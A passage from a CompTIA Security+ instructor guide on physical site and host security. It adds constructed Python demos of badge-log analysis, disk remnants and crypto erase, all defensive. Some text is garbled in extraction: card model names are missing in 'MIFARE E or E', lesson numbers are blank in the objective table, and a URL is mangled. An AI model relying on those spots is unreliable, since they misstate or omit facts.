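READER_ZONE = {"HQ-LOBBY": "lobby", "HQ-OFFICE": "office",
               "HQ-SRV": "server-room", "DC2-LOBBY": "lobby"}
READER_SITE = {"HQ-LOBBY": "hq", "HQ-OFFICE": "hq", "HQ-SRV": "hq", "DC2-LOBBY": "dc2"}

# Constructed minimum travel time between distinct sites, in minutes.
MIN_TRAVEL_MIN = {frozenset({"hq", "dc2"}): 45}


def in_window(t: time, start: time, end: time) -> bool:
    """True if t falls inside [start, end]; handles windows that cross midnight."""
    if start <= end:
        return start <= t <= end
    return t >= start or t <= end


def travel_minutes(site_a: str, site_b: str) -> int:
    return 0 if site_a == site_b else MIN_TRAVEL_MIN[frozenset({site_a, site_b})]


Event = Tuple[str, str, str]           # (ISO-8601 timestamp, card id, reader id)
Finding = Tuple[str, str, str, str]    # event fields plus the reason it was flagged


def analyze(events: List[Event]) -> List[Finding]:
    """Return findings for every event that violates policy or implies cloning.

    Reasons: "unknown_card", "unauthorized_zone", "off_hours", "impossible_travel".
    """
    findings: List[Finding] = []
    last_seen: Dict[str, Tuple[datetime, str]] = {}   # card -> (time, site)
    for ts_str, card, reader in sorted(events):
        ts = datetime.fromisoformat(ts_str)
        policy = POLICIES.get(card)
        if policy is None:
            findings.append((ts_str, card, reader, "unknown_card"))
            continue
        zone, site = READER_ZONE[reader], READER_SITE[reader]
        if zone not in policy.zones:
            findings.append((ts_str, card, reader, "unauthorized_zone"))
        if not in_window(ts.time(), policy.start, policy.end):
            findings.append((ts_str, card, reader, "off_hours"))
        prev = last_seen.get(card)
        if prev is not None:
            prev_ts, prev_site = prev
            needed = timedelta(minutes=travel_minutes(prev_site, site))
            if prev_site != site and ts - prev_ts < needed:
                findings.append((ts_str, card, reader, "impossible_travel"))
        # Record presence even for denied swipes: the card was physically there.
        last_seen[card] = (ts, site)
    return findings


# Constructed badge events for one day (out of order on purpose; analyze() sorts).
SAMPLE_EVENTS: List[Event] = [
    ("2021-08-30T08:05:00", "C-1001", "HQ-LOBBY"),
    ("2021-08-30T08:07:00", "C-1001", "HQ-SRV"),
    ("2021-08-30T23:10:00", "C-1002", "HQ-OFFICE"),   # bob, well outside 08:00-18:00
    ("2021-08-30T08:20:00", "C-1002", "HQ-LOBBY"),
    ("2021-08-30T08:31:00", "C-1002", "HQ-SRV"),      # bob is not cleared for the server room
    ("2021-08-30T08:40:00", "C-1001", "DC2-LOBBY"),   # alice's card at DC2 33 min after HQ
    ("2021-08-30T12:00:00", "C-9999", "HQ-LOBBY"),    # card not in inventory
]

if __name__ == "__main__":
    for ts, card, reader, reason in analyze(SAMPLE_EVENTS):
        print(f"{ts} {card} @ {reader}: {reason}")
```

The lock itself only enforces the zone check; the off-hours and impossible-travel findings come from correlating the accounting records, which is why the logs matter even when every individual swipe was handled correctly.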

When evaluating risks from card cloning and skimming, you need to realize that there are
many types of smart card. For example, old MIFARE Classic cards used as public transit
payment cards are easily cloned because they use a weak cryptographic implementation.
Building entry systems using contactless cards with no cryptoprocessing are also vulnerable
(youtube.com watch v cxxnuof Ec). Cloning of MIFARE E or E smart cards that
implement a TPM-like cryptoprocessor is not thought to be possible.

Malicious USB charging cables and plugs are also a widespread problem. As with card
skimming, a device may be placed over a public charging port at airports and other
transit locations. A USB data blocker can provide mitigation against these juice-
jacking attacks by preventing any sort of data transfer when the smartphone or laptop
is connected to a charge point (zdnet.com/article/this-cheap-gadget-can-stop-your-
smartphone-or-tablet-being-hacked-at-an-airport-hotel-or-cafe).

Show Slide(s): Alarm Systems and Sensors

Alarm Systems and Sensors
When designing premises security, you must consider the security of entry points that
could be misused, such as emergency exits, windows, hatches, grilles, and so on. These
may be fitted with bars, locks, or alarms to prevent intrusion. Also consider pathways
above and below, such as false ceilings and ducting. There are five main types of alarm:

• Circuit—a circuit-based alarm sounds when the circuit is opened or closed,
depending on the type of alarm. This could be caused by a door or window opening
or by a fence being cut. A closed-circuit alarm is more secure because an open
circuit alarm can be defeated by cutting the circuit.

• Motion detection—a motion-based alarm is linked to a detector triggered by any
movement within an area (defined by the sensitivity and range of the detector), such
as a room. The sensors in these detectors are either microwave radio reflection
(similar to radar) or passive infrared (PIR), which detect moving heat sources.

• Noise detection—an alarm triggered by sounds picked up by a microphone. Modern
AI-backed analysis and identification of specific types of sound can render this type
of system much less prone to false positives.

• Proximity—radio frequency ID (RFID) tags and readers can be used to track the
movement of tagged objects within an area. This can form the basis of an alarm
system to detect whether someone is trying to remove equipment.

• Duress—this type of alarm is triggered manually by staff if they come under
threat. There are many ways of implementing this type of alarm, including wireless
pendants, concealed sensors or triggers, and DECT handsets or smartphones. Some
electronic entry locks can also be programmed with a duress code that is different
from the ordinary access code. This will open the gateway but also alert security
personnel that the lock has been operated under duress.

Circuit-based alarms are typically suited for use at the perimeter and on windows
and doors. These may register when a gateway is opened without using the lock
mechanism properly or when a gateway is held open for longer than a defined period.
Motion detectors are useful for controlling access to spaces that are not normally
used. Duress alarms are useful for exposed staff in public areas. An alarm might simply
sound an alert or it may be linked to a monitoring system. Many alarms are linked
directly to local law enforcement or to third-party security companies. A silent alarm
alerts security personnel rather than sounding an audible alarm.

Show Slide(s): Security Guards and Cameras

Security Guards and Cameras
Surveillance is typically a second layer of security designed to improve the resilience of
perimeter gateways. Surveillance may be focused on perimeter areas or within security
zones themselves. Human security guards, armed or unarmed, can be placed in front
of and around a location to protect it. They can monitor critical checkpoints and verify
identification, allow or disallow access, and log physical entry events. They also provide
a visual deterrent and can apply their own knowledge and intuition to potential security
breaches. The visible presence of guards is a very effective intrusion detection and
deterrence mechanism, but is correspondingly expensive. It also may not be possible
to place security guards within certain zones because they cannot be granted an
appropriate security clearance. Training and screening of security guards is imperative.
CCTV (closed circuit television) is a cheaper means of providing surveillance than
maintaining separate guards at each gateway or zone, though still not cheap to set up
if the infrastructure is not already in place on the premises. It is also quite an effective
deterrent. The other big advantage is that movement and access can be recorded. The
main drawback compared to the presence of security guards is that response times are
longer, and security may be compromised if not enough staff are in place to monitor
the camera feeds.

CCTV installed to monitor a server room. (Image by Mario Lo Presti, 123rf.com.)

The cameras in a CCTV network are typically connected to a multiplexer using coaxial
cabling. The multiplexer can then display images from the cameras on one or more
screens, allow the operator to control camera functions, and record the images to tape
or hard drive. Newer camera systems may be linked in an IP network, using regular
data cabling.

If you consider control types, a security guard is a preventive control, as the guard can both
discover and act to prevent an attack. A camera is a detective control only.

Camera systems and robotics can use AI and machine learning to implement smart
physical security (theverge.com, "artificial-intelligence-surveillance-cameras-security"):

• Motion recognition—the camera system might be configured with gait identification
technology. This means that the system can generate an alert when anyone moves
within sight of the camera and the pattern of their movement does not match a
known and authorized individual.

• Object detection—the camera system can detect changes to the environment, such
as a missing server, or unknown device connected to a wall port.

• Robot sentries—surveillance systems (and in some cases weapon systems) can be
mounted on a wholly or partially autonomous robot (switch.com/switch-sentry).

• Drones/UAV—cameras mounted on drones can cover wider areas than ground-
based patrols (zdnet.com/article/best-security-surveillance-drones-for-business).


Show Slide(s): Reception Personnel and ID Badges

Reception Personnel
One of the most important parts of surveillance is the challenge policy. This sets out
what type of response is appropriate in given situations and helps to defeat social
engineering attacks. This must be communicated to and understood by the staff.
Challenges represent a whole range of different contact situations. For example:
• Challenging visitors who do not have ID badges or are moving about
unaccompanied.

• Insisting that proper authentication is completed at gateways, even if this means
inconveniencing staff members (no matter their seniority).

• Intruders and/or security guards may be armed. The safety of staff and compliance
with local laws has to be balanced against the imperative to protect the company's
other resources.

It is much easier for employees to use secure behavior in these situations if they know
that their actions are conforming to a standard of behavior that has been agreed upon
and is expected of them.

Reception Personnel and Visitor Logs
An access list held at the reception area for each secure gateway records who is
allowed to enter. An electronic lock may be able to log access attempts or a reception
staff can manually log movement. At the lowest end, a sign in and sign out sheet can
be used to record authorized access. Visitor logging requirements will vary depending
on the organization, but should include at least the name and company being
represented, date, time of entry and departure, reason for visiting, and contact within
the organization.

Two-Person Integrity/Control
Reception areas for high-security zones might be staffed by at least two people at all
times, providing integrity for entry control and reducing the risk of insider threat.

ID Badges
A photographic ID badge showing name and (perhaps) access details is one of the
cornerstones of building security. Anyone moving through secure areas of a building
should be wearing an ID badge; anyone without an ID badge should be challenged.
Color coding could be used to make it obvious to which zones a badge is granted
access.


Review Activity:
Physical Site Security Controls
Answer the following questions:

1. What physical site security controls act as deterrents?

Lighting is one of the most effective deterrents. Any highly visible security control
(guards, fences, dogs, barricades, CCTV, signage, and so on) will act as a deterrent.

2. What use might a proximity reader be for site security?

One type of proximity reader allows a lock to be operated by a contactless smart card.
Proximity sensors can also be used to track objects via RFID tags.

3. What are the two main options for mobile camera surveillance?

Robot sentries and drone/UAV-mounted cameras.

4. What physical security system provides mitigation against juice-jacking?

A USB data blocker can be attached to the end of a cable to prevent a charging port
from trying to make a data connection.


Topic 21B
Explain the Importance of Physical
Host Security Controls

EXAM OBJECTIVES COVERED
2.7 Explain the importance of physical security controls
4.1 Given a scenario, use the appropriate tool to assess organizational security (Data
sanitization only)

Teaching Tip: The final topic covers environmental security and remnant removal.

As with data networks, perimeter defenses are not sufficient to ensure the security of
hosts within a site. As well as the risk that the perimeter could be breached, security
systems must also be resilient against insider threats. You need to deploy additional
controls to secure areas, such as computer rooms and data centers.
Environmental security ensures that risks to availability from hosts overheating are
minimized. All sites also need effective procedures for the disposal of equipment and
paper records, to ensure that confidential data remnants are not at risk of exposure.

Show Slide(s): Secure Areas

Secure Areas
A secure area is designed to store critical assets with a higher level of access protection
than general office areas. The most vulnerable point of the network infrastructure will
be the communications or server room. This should be subject to the most stringent
access and surveillance controls that can be afforded. Similar measures apply to
hardening access to data centers.
Installing equipment within secure cabinets/enclosures provides mitigation
against insider attack and attacks that have broken through the perimeter security
mechanisms. These can be supplied with key-operated or electronic locks.

Rack cabinet with key-operated lock. (Image © 123RF.com.)


Some data centers may contain racks with equipment owned by different companies
(colocation). These racks can be installed inside cages so that technicians can only
physically access the racks housing their own company's servers and appliances.

Colocation cages. (Image by Chris Dag and shared with CC BY 2.0 flickr.com/photos/chrisdag/865711871.)

Air Gap/Demilitarized Zone
An air gapped host is one that is not physically connected to any network. Such a host
would also normally have stringent physical access controls, such as housing it within a
secure enclosure, validating any media devices connected to it, and so on.
An air gap within a secure area serves the same function as a demilitarized zone. It is
an empty area surrounding a high-value asset that is closely monitored for intrusions.
As well as being disconnected from any network, the physical space around the host
makes it easier to detect unauthorized attempts to approach the asset. Security
policies should prevent any unauthorized computing hosts or storage media from
being carried into the DMZ.

Safes and Vaults
Portable devices and media (backup tapes or USB media storing encryption keys, for
instance) may be stored in a safe. Safes can feature key-operated or combination locks
but are more likely to come with electronic locking mechanisms. Safes can be rated to
a particular cash value for the contents against various international grading schemes.
There are also fire safes that give a certain level of protection against exposure to
smoke and flame (and to water penetration from fire extinguishing efforts).
A vault is a room that is hardened against unauthorized entry by physical means, such
as drilling or explosives. A vault is expensive, but may be considered necessary for
mission critical assets that need to be very securely air gapped, such as the root server
for a commercial CA.


Show Slide(s): Protected Distribution and Faraday Cages

Protected Distribution and Faraday Cages
A physically secure cabled network is referred to as protected cable distribution or as a
protected distribution system (PDS). There are two principal risks:
• An intruder could attach eavesdropping equipment to the cable (a tap).

• An intruder could cut the cable (Denial of Service).

A hardened PDS is one where all cabling is routed through sealed metal conduit and
subject to periodic visual inspection. Lower grade options are to use different materials
for the conduit (plastic, for instance). Another option is to install an alarm system within
the cable conduit, so that intrusions can be detected automatically.
It is possible to install communications equipment within a shielded enclosure,
known as a Faraday Cage. The cage is a charged conductive mesh that blocks
signals from entering or leaving the area. The risk of eavesdropping from leakage
of electromagnetic signals was investigated by the DoD who defined TEMPEST
(Transient Electromagnetic Pulse Emanation Standard) as a means of shielding the
signals.

Show Slide(s): Heating, Ventilation, Air Conditioning

Teaching Tip: Some students might not consider environmental exposures to be
information security issues. Throughout the topic, encourage discussion of how
various forms of security should work together to protect all assets of an
organization.

Heating, Ventilation, Air Conditioning
Environmental controls mitigate the loss of availability through mechanical issues
with equipment, such as overheating. Building control systems maintain an optimum
working environment for different parts of the building. The acronym HVAC (Heating,
Ventilation, Air Conditioning) is often used to describe these services. An AC uses
temperature sensors and moisture detection sensors (to measure humidity).

Use a portable monitor to verify that the AC's temperature and humidity sensors are
returning the correct readings.

For computer rooms and data centers, a thermostatically controlled environment is
usually kept at a temperature of around 20-22°C (68-71°F) and relative humidity of
50%. The heat generated by equipment per hour is measured in British Thermal Units
(BTU) or kilowatts (kW). 1 kW is 3412 BTU. To calculate the cooling requirement for an
air conditioning system, multiply the wattage of all equipment in the room (including
lighting) by 3.41 to get the BTU/hour. If the server room is occupied (unlikely in most
cases), add 400 BTU/person. The air conditioner's BTU rating must exceed this total
value.

Some data centers (notably those operated by Google) are allowing higher temperatures
(up to around 26°C/80°F). This can achieve significant energy cost savings and modern
electronics is proving reliable at this temperature.

The positive air pressure created by the AC system also forces contaminants such as
dust out of the facility. Filters on AC systems collect the dust and must be changed
regularly. When using an air conditioning system, ensure that it is inspected and
maintained periodically. Systems may be fitted with alarms to alert staff to problems.
Mission critical systems may require a backup air conditioning system.

The server room should not be used as storage space. Do not leave boxes or unused
equipment in it. Also, do not install unnecessary devices that generate a lot of heat and
dust, such as printers.


Show Slide(s): Hot and Cold Aisles

Hot and Cold Aisles
A data center or server room should be designed in such a way as to maximize airflow
across the server or racks. If multiple racks are used, install equipment so that servers
are placed back-to-back, not front-to-back, so that the warm exhaust from one bank of
servers is not forming the air intake for another bank. This is referred to as a hot aisle/
cold aisle arrangement. In order to prevent air leaks from the hot aisle to the cold
aisle, ensure that any gaps in racks are filled by blank panels and use strip curtains or
excluders to cover any spaces above or between racks.

Hot aisle containment design: Cold air circulates from the air conditioner under the floor and around
the rack, while hot air is drawn from between the racks through the ceiling space (plenum) to a heat
exchanger. In this design, it is important that hot air does not leak from the ceiling or from the floor
space between the racks. (Image © 123RF.com.)

Make sure that cabling is secured by cable ties or ducting and does not run across
walkways. Cable is best run using a raised floor. If running cable through plenum
spaces, make sure it is fire retardant and be conscious of minimizing proximity to
electrical sources, such as electrical cable and fluorescent light, which can corrupt data
signals (Electromagnetic Interference [EMI]). You also need to ensure that there is
sufficient space in the plenum for the air conditioning system to work properly; filling
the area with cable is not the best idea.

To reduce interference, data network cabling should not be run parallel to power cabling. If
EMI is a problem, shielded cabling can be installed. Alternatively, the copper cabling could
be replaced with fiber optic cabling, which is not susceptible to EMI.

Show Slide(s): Fire Detection and Suppression

Fire Detection and Suppression
Health and safety legislation dictates what mechanisms an organization must put in
place to detect and suppress fires. Some basic elements of fire safety include:
• Well-marked fire exits and an emergency evacuation procedure that is tested and
practiced regularly.

• Building design that does not allow fire to spread quickly, by separating different
areas with fire-resistant walls and doors.

• Automatic smoke or fire detection systems, as well as alarms that can be operated
manually.

Fire suppression systems work on the basis of the fire triangle. The fire triangle
works on the principle that a fire requires heat, oxygen, and fuel to ignite and burn.
Removing any one of those elements provides fire suppression (and prevention). In
the US (and most other countries), fires are divided by class under the NFPA (National
Fire Protection Association) system, according to the combustible material that fuels
the fire. Portable fire extinguishers come in several different types, with each type
being designed for fighting a particular class of fire. Notably, Class C extinguishers use
gas-based extinguishing and can be used where the risk of electric shock makes other
types unsuitable.

Under the European classification system, electrical fires are Class E.

Premises may also be fitted with an overhead sprinkler system. Wet-pipe sprinklers
work automatically, are triggered by heat, and discharge water. Wet-pipe systems
constantly hold water at high pressure, so there is some risk of burst pipes and
accidental triggering, as well as the damage that would be caused in the event of
an actual fire. There are several alternatives to wet-pipe systems that can minimize
damage that may be caused by water flooding the room.
• Dry pipe—these are used in areas where freezing is possible; water only enters this
part of the system if sprinklers elsewhere are triggered.
• Pre-action—a pre-action system only fills with water when an alarm is triggered;
it will then spray when the heat rises. This gives protection against accidental
discharges and burst pipes and gives some time to contain the fire manually before
the sprinkler operates.
• Halon—gas-based systems have the advantage of not short circuiting electrical
systems and leaving no residue. Up until a few years ago, most systems used Halon
1301. The use of Halon has been banned in most countries as it is ozone depleting,
though existing installations have not been replaced in many instances and can
continue to operate legally.
• Clean agent—alternatives to Halon are referred to as clean agent. As well as not
being environmentally damaging, these gases are considered nontoxic to humans.
Examples include INERGEN (a mixture of CO2, argon, and nitrogen), FM-200
(HFC-227), and FE-13. The gases both deplete the concentration of oxygen in the area
(though not to levels dangerous to humans) and have a cooling effect. CO2 can be
used too, but it is not safe for use in occupied areas.

Show Slide(s): Secure Data Destruction

Secure Data Destruction
Physical security controls also need to take account of the disposal phase of the data
life cycle. Media sanitization and remnant removal refer to erasing data from hard
drives, flash drives/SSDs, tape media, CD and DVD-ROMs before they are disposed of
or put to a different use. Paper documents must also be disposed of securely. Data
remnants can be dealt with either by destroying the media or by purging it (removing
the confidential information but leaving the media intact for reuse).
One approach to sanitization is to destroy the media, rendering it unusable. There are
several physical destruction options:
• Burning—incineration is an effective method for all media types, so long as it is
performed in a furnace designed for media sanitization. Municipal incinerators may
leave remnants.

• Shredding and pulping—most media can be shredded. For paper documents,
shredders are rated by the size of the remnants they reduce a sheet to. Level 1 is
12 mm strips, while Level 6 is 0.8x4 mm particles. Pulping the shredded remains with
water or incinerating them provides an extra measure of protection. Some office
shredders can destroy optical media too. Industrial shredders can destroy hard
drives and flash drives.
• Pulverizing—hitting a hard drive with a hammer can leave a surprising amount of
recoverable data, so this type of destruction should be performed with industrial
machinery.
• Degaussing—exposing a hard disk to a powerful electromagnet disrupts the
magnetic pattern that stores the data on the disk surface. Note that SSDs, flash
media, and optical media cannot be degaussed, only hard disk drives.
Due to the cost of facilities, physical destruction is likely to be contracted to a third
party. It is important to use a reputable service provider and to obtain a detailed
inventory of how each media item was sanitized and certificates of destruction.

Show Slide(s): Data Sanitization Tools

Teaching Tip: It seems fitting to end the course with irrevocable techniques to utterly
destroy information!

Data Sanitization Tools
Files deleted from a magnetic-type hard disk are not erased. Rather, the sectors are
marked as available for writing and the data they contain will only be removed as new
files are added. Similarly, using the standard Windows format tool will only remove
references to files and mark all sectors as usable.
The standard method of sanitizing an HDD is called overwriting. This can be performed
using the drive's firmware tools or a utility program. The most basic type of overwriting
is called zero filling, which just sets each bit to zero. Single pass zero filling can leave
patterns that can be read with specialist tools. A more secure method is to overwrite
the content with one pass of all zeros, then a pass of all ones, and then a third pass in a
pseudorandom pattern. Some secret service agencies require more than three passes.
Overwriting can take a considerable amount of time to complete, depending on the
number of passes.

Active@ KillDisk data wiping software. (Screenshot used with permission from LSoft Technologies, Inc.)
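The two points above (a delete only frees sectors, and an overwrite needs more than one zero-fill pass to be trusted) are easier to reason about against a model you can run. The following Python is an added example, not code from the guide or from any of the wiping tools it names. The ToyDisk class, its 512-byte sectors, the allocation table, and the sample file content are all constructed for the illustration; the carve() method stands in for what a recovery tool does when it reads raw sectors without consulting the file system.

```python
import os

SECTOR_SIZE = 512  # assumed sector size for the toy model


class ToyDisk:
    """Constructed model of a block device: fixed-size sectors plus a minimal
    allocation table. It exists only to make 'delete is not erase' visible;
    real drives and file systems are far more complex."""

    def __init__(self, sectors: int = 64):
        self.data = bytearray(SECTOR_SIZE * sectors)
        self.free = list(range(sectors))   # sectors not owned by any file
        self.table = {}                    # file name -> list of sector numbers

    def write_file(self, name: str, content: bytes) -> list:
        """Allocate enough free sectors for 'content' and write it there."""
        needed = (len(content) + SECTOR_SIZE - 1) // SECTOR_SIZE
        if needed > len(self.free):
            raise OSError("disk full")
        owned = [self.free.pop(0) for _ in range(needed)]
        for i, sector in enumerate(owned):
            chunk = content[i * SECTOR_SIZE:(i + 1) * SECTOR_SIZE]
            start = sector * SECTOR_SIZE
            self.data[start:start + len(chunk)] = chunk
        self.table[name] = owned
        return owned

    def delete_file(self, name: str) -> list:
        """A conventional delete: drop the table entry and mark the sectors
        free. Nothing on the platter changes, which is the remnant problem."""
        owned = self.table.pop(name)
        self.free.extend(owned)
        return owned

    def carve(self, needle: bytes) -> bool:
        """What a recovery tool does: scan raw sectors, ignoring the table."""
        return needle in self.data


def overwrite_sectors(disk: ToyDisk, sectors: list,
                      passes=("zeros", "ones", "random")) -> int:
    """Sanitize the given sectors with the pass sequence the text describes:
    all zeros, then all ones, then a pseudorandom pattern. Returns the number
    of passes performed. The random pass uses os.urandom so no fixed pattern
    is left on the media."""
    for pattern in passes:
        for sector in sectors:
            if pattern == "zeros":
                fill = bytes(SECTOR_SIZE)
            elif pattern == "ones":
                fill = b"\xff" * SECTOR_SIZE
            elif pattern == "random":
                fill = os.urandom(SECTOR_SIZE)
            else:
                raise ValueError("unknown pass pattern: %r" % (pattern,))
            start = sector * SECTOR_SIZE
            disk.data[start:start + SECTOR_SIZE] = fill
    return len(passes)


def demo() -> dict:
    """Run the scenario end to end and report what each step observed."""
    secret = b"CONSTRUCTED-SAMPLE: payroll export Q3"  # constructed content
    disk = ToyDisk()
    sectors = disk.write_file("payroll.csv", secret)
    disk.delete_file("payroll.csv")
    after_delete = disk.carve(secret)        # still recoverable
    overwrite_sectors(disk, sectors, passes=("zeros",))
    after_zero = disk.carve(secret)          # gone, but single pass only
    sectors = disk.write_file("payroll.csv", secret)
    overwrite_sectors(disk, sectors)         # zeros, ones, random
    after_three = disk.carve(secret)
    return {"after_delete": after_delete,
            "after_zero_fill": after_zero,
            "after_three_pass": after_three}


if __name__ == "__main__":
    print(demo())
```

The model cannot show the residual-magnetism patterns that make single-pass zero filling untrusted on magnetic media; what it does show is that the overwrite has to target the sectors a file actually occupied, which is exactly what is unavailable to host software on an SSD with wear leveling (see Secure Erase below).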


Examples of tools supporting secure file or disk erasing include Sdelete (part of Sysinternals
docs.microsoft.com/sysinternals) and Darik's Boot and Nuke (dban.org), plus the Active@
KillDisk suite shown here.

Secure Erase (SE)
Since 2001, the ATA and Serial Attached SCSI (SAS) specifications have included a
Secure Erase (SE) command. This command can be invoked using a drive/array utility
or the hdparm Linux utility. On HDDs, this performs a single pass of zero filling.
For SSDs and hybrid drives (and some thumb drives and flash memory cards),
overwriting methods are not reliable, because the device uses wear-leveling routines
in the drive controller to communicate which locations are available for use to any
software process accessing the device.
On SSDs, the SE command marks all blocks as empty. A block is the smallest unit on
flash media that can be given an erase command. The drive firmware's automatic
garbage collectors then perform the actual erase of each block over time. If this
process is not completed (and there is no progress indicator), there is a risk of remnant
recovery, though this requires removing the chips from the device to analyze them in
specialist hardware.

Instant Secure Erase (ISE)
HDDs and SSDs that are self-encrypting drives (SEDs) support another option, invoking
a SANITIZE command set in ATA and SAS standards from 2012 to perform a crypto
erase. Drive vendors implement this as Instant Secure Erase (ISE). With an SED, all data
on the drive is encrypted using a media encryption key. When the erase command is
issued, the MEK is erased, rendering the data unrecoverable. FIPS 140-2 or FIPS 140-3
validation provides assurance that the cryptographic implementation is strong.

If the device firmware does not support encryption, using a software disk encryption
product and then destroying the key and using SE should be sufficient for most
confidentiality requirements.
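The ISE mechanism, and the reason the software-encryption fallback in the note above works the same way, can be shown with a small model. This is an added Python example, not code from the guide or from any drive vendor: the ToySED class, its HMAC-SHA256 counter-mode keystream (a constructed stand-in for the AES-XTS a real SED controller uses) and the sample data are all assumptions of the example. The point it demonstrates is that only ciphertext ever reaches the flash, so discarding the media encryption key (MEK) sanitizes the whole device without rewriting a single block, which is why crypto erase is fast, leaves the media reusable, and does not depend on host software being able to reach every physical block through a wear-leveling controller.

```python
import hashlib
import hmac
import os


def keystream(key: bytes, block: int, length: int) -> bytes:
    """Toy counter-mode keystream: HMAC-SHA256(key, block || counter) chunks.
    Constructed for illustration only; it is not the cipher mode real SEDs use."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        msg = block.to_bytes(8, "big") + counter.to_bytes(8, "big")
        out += hmac.new(key, msg, hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class ToySED:
    """Constructed model of a self-encrypting drive. Every block is stored on
    flash encrypted under a media encryption key (MEK). Here the MEK is a plain
    attribute; on real hardware it is held inside the controller."""

    BLOCK = 4096  # assumed block size for the model

    def __init__(self, blocks: int = 16):
        self.flash = bytearray(self.BLOCK * blocks)  # what a chip-off reader sees
        self.mek = os.urandom(32)                    # media encryption key

    def write(self, block: int, plaintext: bytes) -> None:
        if len(plaintext) > self.BLOCK:
            raise ValueError("write exceeds one block")
        start = block * self.BLOCK
        ct = xor(plaintext, keystream(self.mek, block, len(plaintext)))
        self.flash[start:start + len(ct)] = ct

    def read(self, block: int, length: int) -> bytes:
        start = block * self.BLOCK
        ct = bytes(self.flash[start:start + length])
        return xor(ct, keystream(self.mek, block, length))

    def crypto_erase(self) -> int:
        """ISE / crypto erase: discard the MEK and mint a new one. No flash is
        touched, so the operation takes the same time whatever the capacity and
        the drive is immediately reusable; everything written under the old key
        is unrecoverable because the only key that could decrypt it is gone.
        Returns the number of flash bytes rewritten (always 0)."""
        self.mek = os.urandom(32)
        return 0


def demo() -> dict:
    """Walk through write -> inspect flash -> crypto erase -> reuse."""
    secret = b"CONSTRUCTED-SAMPLE: customer export"  # constructed content
    drive = ToySED()
    drive.write(3, secret)
    readable_before = drive.read(3, len(secret)) == secret
    # Even before sanitizing, a raw dump of the flash never shows the plaintext.
    plaintext_on_flash = secret in drive.flash
    rewritten = drive.crypto_erase()
    readable_after = drive.read(3, len(secret)) == secret
    # The media is reusable straight away under the new key.
    drive.write(3, b"new tenant data")
    reusable = drive.read(3, 15) == b"new tenant data"
    return {"readable_before": readable_before,
            "plaintext_on_flash": plaintext_on_flash,
            "flash_bytes_rewritten": rewritten,
            "readable_after": readable_after,
            "reusable": reusable}


if __name__ == "__main__":
    print(demo())
```

The guarantee rests entirely on the key handling: if the old MEK could be recovered from the controller, or was weakly generated, the ciphertext on the flash would again be readable, which is the property FIPS 140-2/140-3 validation of the drive's cryptographic module is meant to give assurance about.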


Review Activity:
Physical Host Security Controls
Answer the following questions:

1. What policy describes preventing any type of unauthorized computing,
network, or storage connection to a protected host?

This can be described as an air gap or secure area demilitarized zone (DMZ).

2. Where would you expect to find hot and cold aisles and what is their
purpose?

This layout is used in a data center or large server room. The layout is the best way to
maintain a stable temperature and reduce loss of availability due to thermal problems.

3. What security controls might be used to implement protected distribution
of cabling?

Make conduit physically difficult to access, use alarms to detect attempts to interfere
with conduit, and use shielded cabling.

4. What physical security device could you use to ensure the safety of onsite
backup tapes?

A fireproof safe or vault.

5. Which sanitization solution meets all the following requirements:
compatible with both HDD and SSD media, fast operation, and leaves the
media in a reusable state?

A crypto erase or Instant Secure Erase (ISE) sanitizes media by encrypting the data and
then erasing the cryptographic key.

6. What type of physical destruction media sanitization method is not suitable
for USB thumb drives?

Degaussing is ineffective against all types of flash media, including thumb drives, SSDs,
hybrid drives, and memory cards.


Lesson 21
Summary
Teaching Tip: Check that students are confident about the content that has been
covered. If there is time, revisit any content examples that they have questions about.
If you have used all the available time for this lesson block, note the issues, and
schedule time for a review later in the course.

You should be able to explain the importance of physical security controls for access,
surveillance, environmental protection, and secure data destruction.

Guidelines for Physical Security Controls
Follow these guidelines for deploying or upgrading physical security controls:
• If possible, design sites as zones to maximize access controls and surveillance for
the most secure areas, using industrial camouflage, DMZs, air gaps, vaults, and safes
where applicable.

• Secure the site perimeter and access points using fencing, barricades/bollards, and
locks (physical, electronic, and biometric). If using smart cards, use a type that is
resistant to cloning/skimming.

• Monitor the site using security guards, CCTV, robot sentries, and drones/UAV, and
use effective lighting to maximize surveillance.

• Deploy an alarm system (circuit, motion-based, proximity, and/or duress) to detect
intrusion.

• Use security guards, reception personnel, and ID badges to authorize access,
considering the importance of two-person control for integrity.

• Ensure environmental security of compute resources using temperature and
humidity controls and sensors, hot/cold aisle facilities design, and fire detection and
suppression systems.

• Use either physical destruction or data sanitization methods to ensure remnant
removal when disposing of media and devices.

Appendix A
Mapping Course Content to CompTIA
Security+ (Exam SY0-601)
Achieving CompTIA Security+ certification requires candidates to pass Exam SY0-601.
This table describes where the exam objectives for Exam SY0-601 are covered in this
course.

Domain and Objective | Covered in

1.0 Attacks, Threats, and Vulnerabilities
1.1 Compare and contrast different types of social engineering techniques | Lesson , Topic A
Phishing | Lesson , Topic A
Smishing | Lesson , Topic A
Vishing | Lesson , Topic A
Spam | Lesson , Topic A
Spam over Internet messaging (SPIM) | Lesson , Topic A
Spear phishing | Lesson , Topic A
Dumpster diving | Lesson , Topic A
Shoulder surfing | Lesson , Topic A
Pharming | Lesson , Topic A
Tailgating | Lesson , Topic A
Eliciting information | Lesson , Topic A
Whaling | Lesson , Topic A
Prepending | Lesson , Topic A
Identity fraud | Lesson , Topic A
Invoice scams | Lesson , Topic A
Credential harvesting | Lesson , Topic A
Reconnaissance | Lesson , Topic A
Hoax | Lesson , Topic A
Impersonation | Lesson , Topic A
Watering hole attack | Lesson , Topic A
Typosquatting | Lesson , Topic A
Pretexting | Lesson , Topic A
Influence campaigns | Lesson , Topic A
Hybrid warfare | Lesson , Topic A
Social media | Lesson , Topic A


Principles (reasons for effectiveness) | Lesson , Topic A
Authority | Lesson , Topic A
Intimidation | Lesson , Topic A
Consensus | Lesson , Topic A
Scarcity | Lesson , Topic A
Familiarity | Lesson , Topic A
Trust | Lesson , Topic A
Urgency | Lesson , Topic A
1.2 Given a scenario, analyze potential indicators to determine the type of attack | Lesson , Topic B; Lesson , Topic C; Lesson , Topic B; Lesson , Topic A; Lesson , Topic B; Lesson , Topic C; Lesson , Topic A
Malware | Lesson , Topic B
Ransomware | Lesson , Topic B
Trojans | Lesson , Topic B
Worms | Lesson , Topic B
Potentially unwanted programs (PUPs) | Lesson , Topic B
Fileless virus | Lesson , Topic B
Command and control | Lesson , Topic B
Bots | Lesson , Topic B
Cryptomalware | Lesson , Topic B
Logic bombs | Lesson , Topic B
Spyware | Lesson , Topic B
Keyloggers | Lesson , Topic B
